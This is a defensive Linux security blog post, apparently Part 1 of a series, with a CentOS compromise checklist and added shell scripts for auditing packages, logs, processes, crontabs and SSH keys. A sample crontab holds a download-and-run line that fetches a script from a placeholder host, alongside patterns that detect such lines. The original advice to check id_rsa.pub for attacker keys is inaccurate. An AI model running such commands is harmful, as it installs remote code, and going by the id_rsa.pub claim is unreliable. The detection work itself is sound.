
Detecting System Compromise: A Comprehensive Checklist for Linux Users (Part 1)

In today’s digital world, keeping our systems secure is something we all care deeply about. Whether you’re a tech pro or just someone who values online safety, the thought of a compromised system can be unsettling.

Part 1: The Basics – Identifying Signs

This blog has 3 parts. Starting with the essentials, we’ll guide you through a basic checklist designed to help you recognize if your system has been compromised or hacked. We’ll focus on CentOS, a widely used Linux distribution.

List of Checks Which Can Determine if A System Is Compromised or Hacked

Check Your Main Packages for Changes

Generally, when a hacker breaks into a Linux system, there is a high chance that they will alter your main packages such as OpenSSH or the kernel. So first of all, check whether these packages have been altered, or whether any of the files or binaries provided by these packages have changed.

The following command performs this check on CentOS (it verifies every installed OpenSSH package against the RPM database):

sudo rpm -qa | grep openssh | xargs -I '{}' sudo rpm -V '{}'

If the above command lists files that you did not change yourself, there is a high chance your system is compromised.
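The output of rpm -V is a nine-character flag string per file (S size, M mode, 5 digest, D device, L link, U user, G group, T mtime, P capabilities; a dot means the attribute still matches the package), optionally followed by a file attribute such as c for config files. Reading a long listing by hand is error-prone, so the following added example, which is not part of the original article, triages the lines by severity: a digest or size change on a non-config file is the finding that matters most, a config file change needs review, and a changed timestamp alone is usually noise. The sample input is constructed; the pipeline in the comment feeds it real output on a CentOS host.

```sh
#!/bin/sh
# Added example (not from the original article): triage the output of
# `rpm -V` so that a long verification listing can be read quickly.
# The sample below is constructed; on a live CentOS host feed it from
#   rpm -qa | grep openssh | xargs -I '{}' rpm -V '{}' | triage_rpm_verify

# Constructed rpm -V output. Format: 9 verification flags, optional file
# attribute (c = config, d = documentation, ...), then the path.
SAMPLE_RPM_V='S.5....T.    /usr/bin/ssh
.......T.  c /etc/ssh/ssh_config
S.5....T.  c /etc/ssh/sshd_config
.M.......    /usr/libexec/openssh/sftp-server
missing    d /usr/share/doc/openssh/README
.......T.    /usr/share/man/man1/ssh.1.gz'

# Reads rpm -V lines on stdin and prints: SEVERITY<TAB>reason<TAB>path
# Flags: S size, M mode, 5 digest, D device, L link, U user, G group,
# T mtime, P capabilities. A dot means the attribute matched the package.
triage_rpm_verify() {
    awk '
    NF < 2 { next }
    {
        path = $NF
        attr = (NF == 3) ? $2 : ""
        if ($1 == "missing") {
            sev = (attr == "d") ? "LOW" : "HIGH"; reason = "file missing"
        } else {
            f = $1
            content = index(f, "5") || index(f, "S") || index(f, "L")
            perms   = index(f, "M") || index(f, "U") || index(f, "G") || index(f, "P")
            if (content && attr == "c") { sev = "REVIEW"; reason = "config file content changed" }
            else if (content)           { sev = "HIGH";   reason = "package payload content changed" }
            else if (perms)             { sev = "MEDIUM"; reason = "mode/owner/capabilities changed" }
            else                        { sev = "LOW";    reason = "timestamp only" }
        }
        printf "%s\t%s\t%s\n", sev, reason, path
    }'
}

# Runs the constructed sample through the triage (used by the demo below).
triage_sample() {
    printf '%s\n' "$SAMPLE_RPM_V" | triage_rpm_verify
}

triage_sample
```

On the sample, only /usr/bin/ssh comes out as HIGH: its digest changed and it is not a config file. A modified sshd_config is reported as REVIEW because administrators legitimately edit it, which is exactly why the "did you change this yourself" question in the text is the deciding one.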

Run Rootkit Hunter (rkhunter) to check if your system is compromised:

Download rkhunter.tar.gz

Copy it to /root and go to /root

Run the following commands

  • tar zxvf rkhunter-1.4.2.tar.gz
  • cd rkhunter-1.4.2/
  • sh installer.sh --layout default --install

Edit rkhunter.conf

  • ENABLE_TESTS="all"
  • DISABLE_TESTS="none"
  • HASH_CMD=SHA1
  • HASH_FLD_IDX=4
  • PKGMGR=RPM

Run the following commands

  • /usr/local/bin/rkhunter --propupd
  • /usr/local/bin/rkhunter --update
  • /usr/local/bin/rkhunter -c -sk

Note the output, or check and copy /var/log/rkhunter.log.

The following things can be checked in the log file:

  1. Timestamps: The log file will contain timestamps for each scan. These timestamps can help you track when the scans were performed.
  2. Scan Summary: Look for a summary section at the beginning or end of the log. It will provide an overview of the scan results, including the number of checks performed, warnings, and any potential issues.
  3. Warnings and Suspicious Findings: Rkhunter will report any warnings or suspicious findings it encounters during the scan. These findings could include files or processes that match known rootkit signatures, suspicious configuration changes, or other anomalies. Pay close attention to these warnings as they indicate potential security threats.
  4. File and Directory Checks: Rkhunter checks various files and directories for changes or anomalies. It reports any discrepancies it finds. For example, if a system file has been modified or replaced, rkhunter may flag it as a potential issue.
  5. Known Rootkit Signatures: Rkhunter uses a database of known rootkit signatures to compare against files and processes on your system. If it finds a match, it will report it in the log.

You can also check the link for instructions on using rkhunter.

Analyzing Secure Logs

Check /var/log/secure to see whether there are many authentication failures, which indicate that someone is trying to brute-force their way into the system:

The command is:

[root@localhost ~]# grep 'authentication failures' /var/log/secure

The output will be something like:

  • Apr 25 12:48:46 localhost sshd[2391]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.29.14 user=root
  • Apr 25 12:49:33 localhost sshd[2575]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.29.14 user=root

In the above output, the rhost field shows where the login attempts are coming from.

If you see many entries like this, also check whether at some point a login attempt from any of those rhosts succeeded.

In the secure log, an accepted login looks like this:

  • Apr 25 12:53:10 localhost sshd[3551]: Accepted password for root from 192.168.29.14 port 36362 ssh2
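Grepping for failures and then for "Accepted" separately means correlating the two by eye. The following added example, which is not part of the original article, does that correlation per source host: it counts failures per rhost and raises ALERT for any host that failed repeatedly and then got an accepted login. The log lines are constructed, reusing the article's 192.168.29.14 plus two made-up hosts; how the "PAM N more authentication failures" summary line is counted is an assumption noted in the code.

```sh
#!/bin/sh
# Added example (not from the original article): correlate failed and
# accepted sshd logins per source host in /var/log/secure.
# The sample log is constructed. On a live host:
#   correlate_secure_log < /var/log/secure

SAMPLE_SECURE_LOG='Apr 25 12:48:40 localhost sshd[2391]: Failed password for root from 192.168.29.14 port 36360 ssh2
Apr 25 12:48:43 localhost sshd[2391]: Failed password for root from 192.168.29.14 port 36360 ssh2
Apr 25 12:48:46 localhost sshd[2391]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.29.14 user=root
Apr 25 12:49:30 localhost sshd[2575]: Failed password for root from 192.168.29.14 port 36361 ssh2
Apr 25 12:49:33 localhost sshd[2575]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.29.14 user=root
Apr 25 12:51:02 localhost sshd[3102]: Failed password for admin from 10.0.0.7 port 51000 ssh2
Apr 25 12:53:10 localhost sshd[3551]: Accepted password for root from 192.168.29.14 port 36362 ssh2
Apr 25 13:02:15 localhost sshd[3700]: Accepted publickey for alice from 10.0.0.20 port 50222 ssh2'

# Reads sshd log lines on stdin. For every host with at least one failure,
# prints: STATUS<TAB>host<TAB>failures=N<TAB>accepted=N<TAB>first_accept=...
# STATUS is ALERT when a host that failed later got an accepted login.
correlate_secure_log() {
    awk '
    # One "Failed password" line per rejected attempt.
    /Failed password for/ {
        for (i = 1; i <= NF; i++) if ($i == "from") { fail[$(i+1)]++; break }
    }
    # "PAM N more authentication failures": counted here as N extra attempts
    # for that rhost (assumption; treat the total as an upper bound, since
    # sshd may also log some of those attempts individually).
    /PAM [0-9]+ more authentication failures/ {
        n = 0
        for (i = 1; i <= NF; i++) if ($i == "PAM") { n = $(i+1) + 0; break }
        if (match($0, /rhost=[^ ]+/)) fail[substr($0, RSTART + 6, RLENGTH - 6)] += n
    }
    /Accepted (password|publickey|keyboard-interactive)/ {
        user = ""; host = ""
        for (i = 1; i <= NF; i++) {
            if ($i == "for") user = $(i+1)
            if ($i == "from") host = $(i+1)
        }
        accept[host]++
        if (!(host in first)) first[host] = $1 " " $2 " " $3 " user=" user
    }
    END {
        for (h in fail) {
            acc = (h in accept) ? accept[h] : 0
            fa  = (h in first) ? first[h] : "-"
            printf "%s\t%s\tfailures=%d\taccepted=%d\tfirst_accept=%s\n", (acc > 0 ? "ALERT" : "INFO"), h, fail[h], acc, fa
        }
    }'
}

# Runs the constructed sample through the correlation (used by the demo below).
correlate_sample() {
    printf '%s\n' "$SAMPLE_SECURE_LOG" | correlate_secure_log
}

correlate_sample
```

On the sample, 192.168.29.14 is reported as ALERT with seven failures followed by an accepted root password login at 12:53:10, which is the pattern the text tells you to look for; 10.0.0.7 failed once and never got in, so it is only INFO. The host that logged in with a key and never failed is not listed at all.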

Check for Unusual or High CPU Consuming Processes

Check whether some unusual process is running and consuming high CPU, using the top and ps commands.

Command to list all processes running on the system: ps aux | less

Also check with the top command whether an unusual process is using a lot of CPU.
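High CPU alone is a weak signal (a backup or transcode job looks the same), so the following added example, which is not part of the original article, combines it with where the executable lives: a process started from /tmp, /dev/shm, /var/tmp or a hidden directory is worth a look whatever its CPU usage. The ps output is constructed; the ps invocation in the comment is what you would pipe in on a live host.

```sh
#!/bin/sh
# Added example (not from the original article): flag processes in `ps`
# output that deserve a closer look: very high CPU, an executable in a
# world-writable directory or hidden path, or a deleted binary.
# The sample is constructed. On a live host:
#   ps -eo pid,user,pcpu,args --sort=-pcpu | flag_processes 80

SAMPLE_PS='PID USER %CPU COMMAND
1 root 0.0 /usr/lib/systemd/systemd --switched-root --system
843 root 0.1 /usr/sbin/sshd -D
1201 mysql 3.2 /usr/libexec/mysqld --basedir=/usr
2210 nobody 97.5 /dev/shm/.k/run -c /dev/shm/.k/cfg
2315 root 45.0 /tmp/sysupdate
2402 alice 92.0 /usr/bin/ffmpeg -i in.mkv out.mp4'

# Reads ps output on stdin (first line is the header); $1 is the %CPU
# threshold (default 80). For each match prints:
#   FLAG<TAB>pid<TAB>user<TAB>cpu<TAB>reasons<TAB>command
flag_processes() {
    awk -v threshold="${1:-80}" '
    NR == 1 { next }
    {
        pid = $1; user = $2; cpu = $3 + 0; exe = $4
        cmd = ""; for (i = 4; i <= NF; i++) cmd = cmd (i > 4 ? " " : "") $i
        reasons = ""
        if (cpu >= threshold)                          reasons = reasons "high-cpu;"
        if (exe ~ /^(\/tmp|\/dev\/shm|\/var\/tmp)\//)   reasons = reasons "world-writable-dir;"
        if (exe ~ /\/\.[A-Za-z0-9_-]/)                 reasons = reasons "hidden-path;"
        if (cmd ~ /\(deleted\)/)                       reasons = reasons "binary-deleted;"
        if (reasons != "") printf "FLAG\t%s\t%s\t%.1f\t%s\t%s\n", pid, user, cpu, reasons, cmd
    }'
}

# Runs the constructed sample through the check (used by the demo below).
flag_sample() {
    printf '%s\n' "$SAMPLE_PS" | flag_processes 80
}

flag_sample
```

Three lines are flagged on the sample: the process in /dev/shm/.k (high CPU, world-writable directory and hidden path all at once), /tmp/sysupdate (location only, at 45% CPU), and ffmpeg, which trips the CPU threshold alone and is the kind of false positive that makes the location reasons more useful than the CPU figure.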

Check if there is some unusual entry in the crontab

Check whether there is an unusual entry in the crontab of any user on the system:

crontab -u <user> -l (by default, the user is root)
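Running crontab -u for one user at a time is easy to cut short, and "unusual" is hard to judge line by line. The following added example, which is not part of the original article, collects every user's crontab plus the system cron files (that function needs root and is not run here) and flags entries with traits common in cron-based persistence: programs under /tmp, /dev/shm or /var/tmp, hidden directories, download-and-run pipelines, base64 decoding, and @reboot jobs. The crontab it audits is constructed; placeholder.invalid is a placeholder host, not a real one.

```sh
#!/bin/sh
# Added example (not from the original article): gather every crontab on the
# host and flag entries with traits common in malicious persistence.
# The sample crontab is constructed (placeholder.invalid is a placeholder).

SAMPLE_CRONTAB='# constructed crontab for the demo
MAILTO=root
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
30 3 * * 0 /usr/local/bin/backup.sh
*/5 * * * * /tmp/.cache/update >/dev/null 2>&1
@reboot wget -qO- http://placeholder.invalid/u.sh | sh
15 4 * * * echo aGVsbG8= | base64 -d > /var/tmp/.x'

# Gathers user crontabs (the article's crontab -u <user> -l, looped over
# every account in /etc/passwd) plus the system-wide cron files. Needs root;
# not invoked by the demo. Usage: collect_all_crontabs | audit_cron_lines
collect_all_crontabs() {
    cut -d: -f1 /etc/passwd | while read -r u; do
        crontab -u "$u" -l 2>/dev/null | sed "s|^|$u: |"
    done
    cat /etc/crontab /etc/cron.d/* 2>/dev/null
}

# Reads crontab lines on stdin; prints SUSPICIOUS<TAB>reasons<TAB>line or
# OK<TAB>-<TAB>line. Comment and blank lines are skipped.
audit_cron_lines() {
    awk '
    /^[ \t]*(#|$)/ { next }
    {
        r = ""
        if ($0 ~ /(\/tmp|\/dev\/shm|\/var\/tmp)\//)          r = r "world-writable-dir;"
        if ($0 ~ /(curl|wget)[^|]*\|[ \t]*(ba)?sh([ \t]|$)/)  r = r "download-and-execute;"
        if ($0 ~ /base64[ \t]+(-d|--decode)/)                r = r "base64-decode;"
        if ($0 ~ /\/\.[A-Za-z0-9_-]/)                        r = r "hidden-path;"
        if ($0 ~ /^@reboot/)                                 r = r "runs-at-boot;"
        if (r != "") printf "SUSPICIOUS\t%s\t%s\n", r, $0
        else         printf "OK\t-\t%s\n", $0
    }'
}

# Runs the constructed crontab through the audit (used by the demo below).
audit_sample_crontab() {
    printf '%s\n' "$SAMPLE_CRONTAB" | audit_cron_lines
}

audit_sample_crontab
```

The patterns are deliberately coarse: they will also match a legitimate admin script that happens to live in /var/tmp, so the output is a shortlist for a human to read, not a verdict. Anything flagged should be compared with the owner's expectation, which is the same question the rpm -V check asks.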

Check if a hacker has entered a private key in id_rsa.pub

Check id_rsa.pub in the .ssh folder of every user's home directory to see whether an attacker has somehow added their own entry.
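The file sshd consults when deciding whether a key may log in is ~/.ssh/authorized_keys (and authorized_keys2), while id_rsa.pub is only the user's own public key, so a key audit has to walk authorized_keys in every home directory. The following added example, which is not part of the original article, does that and marks every key whose blob is absent from an allowlist you maintain. It runs against a throwaway fixture of fake home directories and fake key blobs, all constructed for the demo; on a real host you would point it at /home (and at /root separately) with your own allowlist file.

```sh
#!/bin/sh
# Added example (not from the original article): list every key that grants
# SSH login on the host and mark keys missing from an allowlist.
# sshd reads ~/.ssh/authorized_keys (and authorized_keys2), so those files
# are walked; id_rsa.pub is only that user's own public key.
# Live usage (root): audit_authorized_keys /home /root/known_keys.txt

# Reads authorized_keys files under HOMES_DIR/<user>/.ssh and prints
#   STATUS<TAB>user<TAB>keytype<TAB>options<TAB>comment<TAB>file
# STATUS is KNOWN when the key blob appears in KNOWN_FILE (one blob per line).
audit_authorized_keys() {
    homes="$1"; known="$2"
    for home in "$homes"/*/; do
        [ -d "$home" ] || continue
        user=$(basename "$home")
        for f in "$home.ssh/authorized_keys" "$home.ssh/authorized_keys2"; do
            [ -f "$f" ] || continue
            awk -v user="$user" -v known="$known" -v file="$f" '
            BEGIN { while ((getline line < known) > 0) ok[line] = 1 }
            /^[ \t]*(#|$)/ { next }
            {
                # An entry is: [options] keytype base64blob [comment]
                for (i = 1; i <= NF; i++) if ($i ~ /^(ssh-|ecdsa-|sk-)/) break
                if (i > NF) { printf "MALFORMED\t%s\t-\t-\t-\t%s\n", user, file; next }
                type = $i; blob = $(i + 1)
                opts = ""
                for (j = 1; j < i; j++) opts = opts (j > 1 ? " " : "") $j
                comment = ""
                for (j = i + 2; j <= NF; j++) comment = comment (j > i + 2 ? " " : "") $j
                status = (blob in ok) ? "KNOWN" : "UNKNOWN"
                printf "%s\t%s\t%s\t%s\t%s\t%s\n", status, user, type, (opts == "" ? "-" : opts), (comment == "" ? "-" : comment), file
            }' "$f"
        done
    done
}

# Builds a throwaway fixture of fake homes and fake key blobs; returns its path.
build_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/home/alice/.ssh" "$d/home/bob/.ssh" "$d/home/carol"
    printf 'ssh-ed25519 AAAAFAKEBLOBALICE alice@laptop\n' > "$d/home/alice/.ssh/authorized_keys"
    printf '# bob\nssh-ed25519 AAAAFAKEBLOBBOB bob@desk\nssh-rsa AAAAFAKEBLOBUNLISTED\n' > "$d/home/bob/.ssh/authorized_keys"
    printf 'AAAAFAKEBLOBALICE\nAAAAFAKEBLOBBOB\n' > "$d/known_keys.txt"
    echo "$d"
}

# Runs the audit over the fixture, then removes it.
demo_audit() {
    d=$(build_fixture)
    audit_authorized_keys "$d/home" "$d/known_keys.txt"
    rm -rf "$d"
}

demo_audit
```

On the fixture, alice's and bob's first keys are KNOWN and bob's second key, an ssh-rsa entry with no comment that is not in the allowlist, is reported UNKNOWN; carol has no .ssh directory and produces nothing. Keeping the allowlist under change control means the UNKNOWN lines are the whole review.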

Conclusion

This was Part 1 of the blog. In later parts, I will explain further checklists to ensure that your system remains less hackable.

Thank you.
